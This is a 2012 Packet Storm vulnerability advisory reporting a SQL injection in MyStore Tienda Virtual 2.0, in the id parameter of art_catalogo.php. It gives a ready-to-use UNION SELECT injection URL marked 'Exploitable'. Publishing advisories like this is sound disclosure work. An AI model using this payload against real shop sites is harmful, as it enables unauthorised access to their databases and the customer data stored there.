MyStore Tienda Virtual 2.0 SQL Injection

2012-01-03T00:00:00
ID PACKETSTORM:108330
Type packetstorm
Reporter Easy Laster
Modified 2012-01-03T00:00:00

Description

                                        
                                            `.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.  
  
~ SQL Injection MyStore Tienda Virtual ~  
  
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.  
  
[+] Autor: easy laster  
  
[+] Vulnerabilities [ SQL Injection ]  
  
[+] Page: http://www.mystore.com.mx/  
  
[+] Language: [ PHP ]  
  
[+] Version: 2.0  
  
[+] Date: 03.01.2012  
  
[+] Status:vulnerable  
.-=--=--=--=--=--=--=--=--=--=--=-.  
  
[+] Vulnerability  
  
art_catalogo.php?id=  
  
  
[+] Exploitable  
  
http://[host]/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+  
  
`